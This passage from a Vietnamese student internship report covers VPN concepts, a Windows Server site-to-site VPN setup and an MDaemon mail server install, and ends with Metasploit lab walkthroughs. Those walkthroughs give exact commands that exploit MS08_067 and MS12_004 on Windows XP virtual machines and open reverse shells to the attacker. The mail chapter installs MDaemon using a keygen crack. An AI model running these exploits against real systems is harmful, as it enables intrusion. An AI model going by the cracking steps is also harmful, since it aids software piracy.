Router Options hiẹn ta cho chúng ta them xóa và edit vớ i nhữ ng thuọc tính khác
cũng vạy
Kiểm tra
72. .
CHƯƠNG 8: TRIỂN KHAI VPN
I. Tìm hiểu VPN
Giải pháp VPN (Virtual Private Network) được thiết kế cho những tổ
chức có xu hướng tăng cường thông tin từ xa vì địa bàn hoạt động rộng (trên
toàn quốc hay toàn cầu). Tài nguyên ở trung tâm có thể kết nối đến từ nhiều
nguồn nên tiết kiệm được được chi phí và thời gian
Một mạng VPN điển hình bao gồm mạng LAN chính tại trụ sở (Văn phòng
chính), các mạng LAN khác tại những văn phòng từ xa, các điểm kết nối (như
'Văn phòng' tại gia) hoặc người sử dụng (Nhân viên di động) truy cập đến từ
bên ngoài.
1. Khái niệm.
Mạng riêng ảo hay VPN (Virtual Private Network) là một mạng dành
riêng để kết nối các máy tính lại với nhau thông qua mạng Internet công cộng.
Những máy tính tham gia mạng riêng ảo sẽ "nhìn thấy nhau" như trong một
mạng nội bộ - LAN (Local Area Network).
Internet là một môi trường công cộng, việc chia sẻ dữ liệu có tính riêng
tư thông qua Internet là cực kỳ nguy hiểm vì những dữ liệu đó có thể dễ dàng bị
rò rỉ, bị ăn cắp... Mạng riêng ảo là giao thức trợ giúp việc kết nối các máy tính lại
với nhau thông qua một kênh truyền dẫn dữ liệu (tunel) riêng đã được mã hóa.
Mạng riêng ảo giúp bảo vệ dữ liệu trong khi chúng được truyền trên
Internet vì vậy mạng riêng ảo thường được ứng dụng trong các trường hợp sau:
73. Làm việc từ xa: Truy cập từ xa thông qua Internet vào mạng của công ty
để chia sẻ dữ liệu cũng như thực thi các ứng dụng nội bộ.
Kết nối nhiều mạng với nhau (Site-to-Site): Nếu công ty có nhiều văn
phòng, việc kết nối các mạng lại với nhau thành một mạng thống nhất sẽ đem
lại hiệu quả ấn tượng trong việc quản lý & chia sẻ thông tin.
Tạo phiên làm việc an toàn: Mạng riêng ảo là giải pháp tốt & với chi phí
thấp cho một số công việc đòi hỏi tính bảo mật cao như quản trị máy chủ,
website, cơ sở dữ liệu...
Nếu thường xuyên làm việc trên Internet & thông tin là tài sản vô giá, bạn
nên ứng dụng mạng riêng ảo vào công việc của mình.
2. Các loại VPN.
Có hai loại phổ biến hiện nay là VPN truy cập từ xa (Remote-Access ) và
VPN điểm-nối-điểm (site-to-site)
VPN truy cập từ xa còn được gọi là mạng Dial-up riêng ảo (VPDN), là một
kết nối người dùng-đến-LAN, thường là nhu cầu của một tổ chức có nhiều nhân
viên cần liên hệ với mạng riêng của mình từ rất nhiều địa điểm ở xa. Ví dụ như
công ty muốn thiết lập một VPN lớn phải cần đến một nhà cung cấp dịch vụ
doanh nghiệp (ESP). ESP này tạo ra một máy chủ truy cập mạng (NAS) và cung
cấp cho những người sử dụng từ xa một phần mềm máy khách cho máy tính
của họ. Sau đó, người sử dụng có thể gọi một số miễn phí để liên hệ với NAS và
dùng phần mềm VPN máy khách để truy cập vào mạng riêng của công ty. Loại
VPN này cho phép các kết nối an toàn, có mật mã.
Hình minh họa cho thấy kết nối giữa Văn phòng chính và "Văn phòng" tại
gia hoặc nhân viên di động là loại VPN truy cập từ xa).
VPN điểm-nối-điểm là việc sử dụng mật mã dành cho nhiều người để kết
nối nhiều điểm cố định với nhau thông qua một mạng công cộng như Internet.
Loại này có thể dựa trên Intranet hoặc Extranet. Loại dựa trên Intranet: Nếu
một công ty có vài địa điểm từ xa muốn tham gia vào một mạng riêng duy nhất,
họ có thể tạo ra một VPN intranet (VPN nội bộ) để nối LAN với LAN.
74. Loại dựa trên Extranet: Khi một công ty có mối quan hệ mật thiết với một
công ty khác (ví dụ như đối tác cung cấp, khách hàng...), họ có thể xây dựng một
VPN extranet (VPN mở rộng) kết nối LAN với LAN để nhiều tổ chức khác nhau
có thể làm việc trên một môi trường chung.
Trong hình minh họa trên, kết nối giữa Văn phòng chính và Văn phòng từ
xa là loại VPN Intranet, kết nối giữa Văn phòng chính với Đối tác kinh doanh là
VPN Extranet.
3.Bảo mật trong VPN
Tường lửa (firewall) là rào chắn vững chắc giữa mạng riêng và Internet.
Bạn có thể thiết lập các tường lửa để hạn chế số lượng cổng mở, loại gói tin và
giao thức được chuyển qua. Một số sản phẩm dùng cho VPN như router 1700
của Cisco có thể nâng cấp để gộp những tính năng của tường lửa bằng cách chạy
hệ điều hành Internet Cisco IOS thích hợp. Tốt nhất là hãy cài tường lửa thật tốt
trước khi thiết lập VPN.
Mật mã truy cập là khi một máy tính mã hóa dữ liệu và gửi nó tới một
máy tính khác thì chỉ có máy đó mới giải mã được. Có hai loại là mật mã riêng
và mật mã chung.
Mật mã riêng (Symmetric-Key Encryption): Mỗi máy tính đều có một mã
bí mật để mã hóa gói tin trước khi gửi tới máy tính khác trong mạng. Mã riêng
yêu cầu bạn phải biết mình đang liên hệ với những máy tính nào để có thể cài
mã lên đó, để máy tính của người nhận có thể giải mã được.
Mật mã chung (Public-Key Encryption) kết hợp mã riêng và một mã công
cộng. Mã riêng này chỉ có máy của bạn nhận biết, còn mã chung thì do máy của
bạn cấp cho bất kỳ máy nào muốn liên hệ (một cách an toàn) với nó. Để giải mã
một message, máy tính phải dùng mã chung được máy tính nguồn cung cấp,
đồng thời cần đến mã riêng của nó nữa. Có một ứng dụng loại này được dùng
rất phổ biến là Pretty Good Privacy (PGP), cho phép bạn mã hóa hầu như bất cứ
thứ gì.
Giao thức bảo mật giao thức Internet (IPSec) cung cấp những tính năng
an ninh cao cấp như các thuật toán mã hóa tốt hơn, quá trình thẩm định quyền
đăng nhập toàn diện hơn.
75. IPSec có hai cơ chế mã hóa là Tunnel và Transport. Tunnel mã hóa tiêu
đề (header) và kích thước của mỗi gói tin còn Transport chỉ mã hóa kích thước.
Chỉ những hệ thống nào hỗ trợ IPSec mới có thể tận dụng được giao thức này.
Ngoài ra, tất cả các thiết bị phải sử dụng một mã khóa chung và các tường lửa
trên mỗi hệ thống phải có các thiết lập bảo mật giống nhau. IPSec có thể mã hóa
dữ liệu giữa nhiều thiết bị khác nhau như router với router, firewall với router,
PC với router, PC với máy chủ.
Máy chủ AAA là viết tắt của ba chữ Authentication (thẩm định quyền truy
cập), Authorization (cho phép) và Accounting (kiểm soát). Các server này được
dùng để đảm bảo truy cập an toàn hơn. Khi yêu cầu thiết lập một kết nối được
gửi tới từ máy khách, nó sẽ phải qua máy chủ AAA để kiểm tra. Các thông tin về
những hoạt động của người sử dụng là hết sức cần thiết để theo dõi vì mục đích
an toàn.
4.Sản phẩm công nghệ dành cho VPN
Tùy vào loại VPN (truy cập từ xa hay điểm-nối-điểm), bạn sẽ cần phải cài
đặt những bộ phận hợp thành nào đó để thiết lập mạng riêng ảo. Đó có thể là:
- Phần mềm cho desktop của máy khách dành cho người sử dụng từ xa.
- Phần cứng cao cấp như bộ xử lý trung tâm VPN hoặc firewall bảo mật
PIX.
- Server VPN cao cấp dành cho dịch vụ Dial-up.
- NAS (máy chủ truy cập mạng) do nhà cung cấp sử dụng để phục vụ
người sử dụng từ xa.
- Mạng VPN và trung tâm quản lý.
5. Bộ xử lý trung tâm VPN
Có nhiều loại máy xử lý VPN của các hãng khác nhau, nhưng sản phẩm
của Cisco tỏ ra vượt trội ở một số tính năng. Tích hợp các kỹ thuật mã hóa và
thẩm định quyền truy cập cao cấp nhất hiện nay, máy xử lý VPN được thiết kế
chuyên biệt cho loại mạng này. Chúng chứa các module xử lý mã hóa SEP, cho
phép người sử dụng dễ dàng tăng dung lượng và số lượng gói tin truyền tải.
Dòng sản phẩm có các model thích hợp cho các mô hình doanh nghiệp từ nhỏ
đến lớn (từ100 cho đến 10.000 điểm kết nối từ xa truy cập cùng lúc).
76. 6. Router dùng cho VPN
Thiết bị này cung cấp các tính năng truyền dẫn, bảo mật. Dựa trên hệ
điều hành Internet IOS của mình, hãng Cisco phát triển loại router thích hợp
cho mọi trường hợp, từ truy cập nhà-tới-văn phòng cho đến nhu cầu của các
doanh nghiệp quy mô lớn.
7. Tường lửa PIX của Cisco
Firewall trao đổi Internet riêng (Private Internet Exchange) bao gồm một
cơ chế dịch địa chỉ mạng rất mạnh, máy chủ proxy, bộ lọc gói tin, các tính năng
VPN và chặn truy cập bất hợp pháp.
Thay vì dùng IOS, thiết bị này có hệ điều hành với khả năng tổ chức cao,
xoay sở được với nhiều giao thức, hoạt động rất mạnh bằng cách tập trung vào
IP.
II.VPN SITE TO SITE
1. chuẩn bị:
- 2 windows server 2008
-2 windows 2007
+ máy PC 1 windows 2007 co ip 192.168.1.2. máy này sẻ ping thông với PC 2 là
windows server 2008 có địa chỉ ip là 192.168.1.1.
77. + máy PC 3 windows 2007 co ip 192.168.2.2 máy này sẻ ping thông với PC 4 là
windows server 2008 có địa chỉ ip là 192.168.2.1.
2. Đặt IP cho 4 máy
Card Lan Card Cross
Server 1 10.0.0.1/24 192.168.1.1/24
Server 2 172.16.1.1/24 192.168.1.2/24
Client 1 10.0.0.2/24
Client 2 172.16.1.2/24
Tạo user saigon trên máy server 1
Tạo user hanoi trên máy server 2
3. Tiến hành cấu hình trên 2 server.
Chọn properties ->chọn tab dial – in -> check chọn allow access
79. Chọn network policy and access services -> next
Chọn routing and remote access services -> next
80. Như vậy là đã cài xong giờ đi cấu hình
Vào start -> administrative ->routing and remote access
81. Chọn server -> click phải configure
Chọn Custom configuration -> next
82. Chọn VPN access + Demand – dial connections + Lan routing -> next
Chọn start service
83. Chọn tab Network interface -> click phải chọn new demand-dial interface
Nhập interface name : saigon -> next
84. Check connect using vitual private networking (VPN) ->next
Check chọn point to point -> next
85. Nhập địa chỉ ip card CROSS của máy server2 -> next
Check chọn route ip + adda user account
86. Add static route 172.16.2.0 (đường mạng LAN của máy server2) -> next
Nhập password của user saigon mình đã tạo ban đầu -> next
Nhập user name :hanoi
Password của user hanoi mình đã tạo ban đầu -> next
90. Properties server chọn tab security -> check chọn allow custom IP sec policy
for L2TP connection -> Apply -> OK
91. Click phải network interface saigon ở server1 -> chọn connect
Click phải network interface hanoi ở server2 -> chọn connect
Xem kết quả connected rồi qua máy client 1 ping máy client 2 và ngược lại để
xem kết quả
93. CHƯƠNG 9: MAIL TRÊN VPS.
I. Cài đặt MDmoon v10.
Các bước cài đặt đã hướng dẫn trên localhost.
I. Cấu hình MDmoon v10.
Đăng ký Domain
Ta truy cập vào dot.tk để đăng ký domain
Sau khi chọn xong domain ta click GO.Click vào sử dụng DNS, chọn tab Dịch Vụ
DNS của Dot.tk, nhập
IP của VPS vào 2 hàng địa chỉ Ip
Sau đó chọn thời gian duy trì domain
94. Nhập ký tự để xác nhận là người sử dụng chứ không phải robot, rồi click : ĐĂNG
Ký
Lựa chọn tài khoản quản lý tên miền:
95. Click “Đăng nhập vào My Dot” để tùy chỉnh các thông số cho domain
Sau khi đăng nhập vào my.dot.tk. Ta click vào Go to domain hoặc Domain panel
để vào danh sách các domain đã đăng ký.
Lựa chọn domain cần đăng lý sau đó click Modify:
Cuối cùng là Save Changes.
96. Mail Server Mdaemon
Định Nghĩa:
Mail Server là một máy chủ cung cấp dịch vụ viết gửi và nhận thư trên
internet.
Để tạo 1 mail server thì có nhiều phần mềm , nhưng nổi tiếng nhất đó là
Mdaemon.
Các bước chuẩn bị:
1VPS làm Mail Server
Phần mềm Mdaemon bản pro
1 Domain đã add record (MX record).
Tiến hành:
Trên máy VPS ta cài Mdaemon và crack thành bản pro (vì bản pro mới cho phép
gởi và nhận mail từ các dịch vụ mail khác, con bản free chỉ cho gởi mail nội bộ)
Cách cài Mdaemon Pro:
Ta chạy file setup MDv10.exe
Điền Lience name : hoangphitt5(tùy chọn)
Company name: Tên Công Ty
Registration Key: Ta lấy trong keygen ở thư mục crack
97. Copy dãy chữ số này paste vào Registration Key Sau khi paste key vào ta click
Next.Lưu ý không check vào Install the Limited.
98. Đợi quá trình cài đặt hoàn tất
Điền domain (mà ta đã đang ký ở dot.tk lúc nãy vào) Domain name
Điền vào tên và địa chỉ mail cũng như mật khẩu cho tài khoảng admin
100. Ta bỏ dầu check( Không chọn vào) ở “Start MDAEMON”
Copy file Mdaemon.exe trong thư mục crack vào thư mục cài đặt Mdaemon
(C:Mdaemonapps) rồi khởi động Mdeamon
101. Click Yes
Ta khỏi động Mdaemon lên rồi tạo User mail
Ta vào Account>>New Account để tạo users
103. Để bỏ giới hạn password->account->account setting>bỏ check requite strong
pw
104. Tạo thêm một tài khoản nguyễn văn b
Xem cấu hình các tài khoản:vào account>edit account
105. Test Trong IE gõ địa chỉ http://192.168.1.1:3000
Đăng nhập tài khoản nguyen van a
106. Trên mail server ta dùng tài khoản nguyen van a gui mail cho nguyen van b
Đăng xuất và đăng nhập tương tự vào tài khoản nguyen van b
107. Ta sẽ thấy được tin nhắn từ tài khoản a
Kết thúc mail mdeamon.
108. CHƯƠNG 10: BẢO MẬT WINDOWS.
I.Khai thác lỗ hổng trên Windows XP với mã lỗi MS08_067
Chuẩn bị 2 máy ảo: Windows XP (nạn nhân) và máy Back Track 5r3 (máy tấn
công nạn nhân)
Trên máy Back Track cấu hình địa chỉ IP trong bài lab này cho máy là:
192.168.154.128
Các bước thực hiện:
Kiểm tra mạng giữa XP và máy Back Track 5r3:
Máy Back Track 5r3:
Máy Xp:
109. Kiểm tra thông mạng:
Trên máy Back track 5r3 ta gõ đường dẫn:
cd /pentest/exploits/framework
Ta tiếp tục gõ lệnh:
./msfcli windows/smb/ms08_067_netapi RHOST=192.168.154.129
LHOST=192.168.154.128 PAYLOAD=windows/shell/reverse_tcp E
110. Trong đó RHOST là IP máy Xp, LHOST là IP máy Back track 5r3.
Sau đó, ta chờ cho máy Back track 5r3 tấn công Xp
Cuối cùng ta đã tấn công được Xp, ta biết được các thông số của máy XP
111. Link tham khảo: https://www.youtube.com/watch?v=n5tNl4vp6V0&hd=1
II.Khai thác lỗ hổng trên Windows XP với mã lỗi MS12_004
Máy Backtrack 5r3 có IP là 192.168.1.2, máy xp có IP là 192.168.1.3
Trên máy Back track vào chương trình terminal và gõ lệnh msfconsole
112. Tìm mã lỗi bằng công cụ metaploit bằng cách gõ lệnh search ms12_004
Sau khi seach được mã lỗi ta dùng lệnh use và copy mã lỗi đã tìm được.
Dùng lệnh show options để biết thêm các câu lệnh cần thiết.
113. Dùng lệnh SRVHOST <địa chỉ ip máy backtrack>
Dùng lệnh set PAYLOAD windows/meterpreter/preverse_tcp
114. Dùng lệnh set LHOST <ip backtrack>
Dùng lệnh exploit để tiến hành khai thác lỗi. Chú ý đường dẫn
http://192.168.1.2:8080/nếu máy nạn nhân vào đường dẫn này sẽ bị hack.
Trở lại máy Windows XP. Kiểm tra địa chỉ IP máy XP. Với địa chỉ ip máy XP là
192.168.1.3
Trên máy XP ta vào trình duyệt web và gõ đường dẫnhttp://192.168.1.2:8080/
115. Trên máy Back Track bắt đầu nhận thấy có sự kết nối đến địa chỉ
Và nhận thấy có địa chỉ kết nối vào. Và tạo phiên kết nối vào nó.
Trên máy back track ta gõ lệnh sessions để kiểm tra.
117. Trên máy backtrack gõ getuid để biết thông tin máy Xp, và tài khoản đang truy
cập.
Gõ sysinfo để biết thông tin chi tiết máy Xp:
Gõ lệnh shell để vào ổ đĩa máy XP:
Giờ thì ta có thể xem được các file trong ổ đĩa của máy XP.
118. CHƯƠNG 13: KẾT LUẬN
I.Các kết quả đạt được.
Sau khi tìm hiểu và triển khai các dịch vụ trên máy ảo VMWare và VPS em đã có
kiến thức về:
- Nguyen lý cơ bản của hẹ đièu hành mạng, kién thứ c vè hẹ thóng mạng, có kỹ
nang càn thiét đẻ cài đạt, cáu hình hoàn chỉnh mạng doanh nghiẹp cỡ vừ a và
lớn dựa vào Windows Server 2008.
- Hiẻu vè cáu trúc hạ tàng, thiét ké và quản trị hẹ thóng mạng, nhiẹm vụ quản lý
bao gòm viẹc đièu hành và hõ trợ hẹ thóng.
- Triển khai, thiết kế, quản lý và chuẩn đoán hỏng hóc cho một hệ thống mạng.
- Có các kiến thức trên nền tảng công nghệ Windows Server 2008.
II.Kinh nghiệm thực tế
Có cái nhìn thực tế về việc cấu hình, quản lý một hệ thống mạng của một doanh
nghiệp thông qua nền tảng.
Được trực tiếp tiếp xúc những công nghệ và thiết bị mà trước đây chỉ biết đến thông
qua sách vở.
Được vận dụng những kiến thức tiếp thu trên lớp vào công việc thực tế.
Bổ sung và trau dồi những thiếu sót về kiến thức trong quá trình học trên lớp.
Trực tiếp triển khai và cấu hình trên máy chủ ảo VPS.
Có kinh nghiệm trong việc khắc phục sự cố khi hệ thống gặp lỗi.
III. Hoàn thiện bản thân
Các thành viên trong nhóm đã định hướng rõ ràng mục tiêu sắp tới sẽ làm.
Tự tin hơn trong việc giao tiếp với mọi người trong công việc.
Nâng cao khả năng làm việc nhóm cũng như khả năng tự bản thân giải quyết vấn đề
khó khăn gặp phải trong công việc.
IV.Các kiến thức được lĩnh hội
Kiến thức thực tế về hệ thống mạng của doanh nghiệp.
Hiểu các thành phần công nghệ mạng doanh nghiệp vừa và nhỏ.
119. V. Kết luận.
Nhìn chung các công việc em đã cơ bản hoàn thành, tuy nhiên sẽ còn nhiều
thiếu sót, đa phần là quá trình tự học. Vì thế mong Thầy cô, các bạn đánh giá và
đưa ra những ý kiến đóng góp để khắc phục và sửa chữa. Bên cạnh trình độ
chuyên môn cũng cần có những kỹ năng mềm như kỹ năng giao tiếp, làm việc
nhóm cũng hết sức quan trọng. Thực tập là giai đoạn quan trọng của sinh viên,
giúp sinh viên có cơ hội làm việc thực tế nhằm củng cố kĩ năng, chuẩn bị cho
giai đoạn làm việc thật sau khi tốt nghiệp.
Trong quá trình thực tập tại Trung tâm ATHENA, nhóm chúng em được tiếp
xúc với một môi trường làm việc chuyên nghiệp, các công nghệ, thiết bị,các mô
hình thực tế... Qua đó nhóm học hỏi được những kinh nghiệm nhất định và có
những suy nghĩ đóng góp sau:
Về công việc: Để thiết kế và triển khai một hệ thống mạng cho một công ty, cần có
nhiều bộ phận phối hợp với nhau để thực hiện và hoàn thành dự án.
Về phát triển kỹ năng:Để các bộ phận có thể phối hợp tốt mỗi nhân viên cần có
những kỹ năng cơ bản để làm việc trong đội, nhóm:
o Làm việc nhóm: Kỹ năng làm việc nhóm là khả năng làm việc hiệu quả trong đội
ngũ. Đó là việc có thể sử dụng đúng người để có được kết quả tốt nhất và luôn sẵn
sàng để có thể lãnh đạo hoặc phối hợp làm theo.
o Tìm hiểu – thu thập thông tin: Quản lý thông tin là khả năng biết được nơi để có
được thông tin cần thiết - để tìm kiếm, định vị, và thu thập nó. Điều này có thể liên
quan đến việc sử dụng các nguồn lực khác nhau, cho dù chúng là từ những con
người hoặc từ các tài liệu trong thế giới rộng lớn của công nghệ
o Kỹ năng giải quyết vấn đề - Tính linh hoạt : Tính linh hoạt là khả năng thích nghi để
giải quyết công việc chúng ta gặp phải hàng ngày trong công việc lẫn đời sống
riêng. Giải quyết vấn đề là xác định vấn đề, nghiên cứu giải pháp và đưa ra những
quyết định hiệu quả.
Về công nghệ: với lợi thế là công ty hoạt động trong lĩnh vực công nghệ
thông tin ,ATHENA có hạ tầng CNTT hiện đại ,an toàn và thông suốt .
120. Clip giới thiệu bản thân :
https://www.facebook.com/video.php?v=330792480451476
https://www.youtube.com/watch?v=AdDIyB2Px0s
Demo up youtube.com
Mdaemon: https://www.youtube.com/watch?v=cTorSEuLjJ8
Domain: https://www.youtube.com/watch?v=xxGMeZU47_Q
Vpn: https://www.youtube.com/watch?v=QfiVwjotJoM
Remote desktop : https://www.youtube.com/watch?v=ImmbG3Cx10I
Share permission: https://www.youtube.com/watch?v=m2JQMa1zA9U
Ou: https://www.youtube.com/watch?v=m2JQMa1zA9U
Phishing: https://www.youtube.com/watch?v=Ra1gRZGD4HU
IIS-DNS: https://www.youtube.com/watch?v=koZ2DwDB3FM
Group policy managerment: https://www.youtube.com/watch?v=J-
dqKQMGCOE
homeFolder userProfile: https://www.youtube.com/watch?v=p4nza3-JvTM
Deploit shoftware: https://www.youtube.com/watch?v=lHtOKZRLWok
Dhcp: https://www.youtube.com/watch?v=zOa5cyt0UJo
Disk quota: https://www.youtube.com/watch?v=rmKRdSTESm0
File server resouce manager :
https://www.youtube.com/watch?v=EzIo1cGjuwQ
Slide share:
http://www.slideshare.net/bosua94/bo-co-tt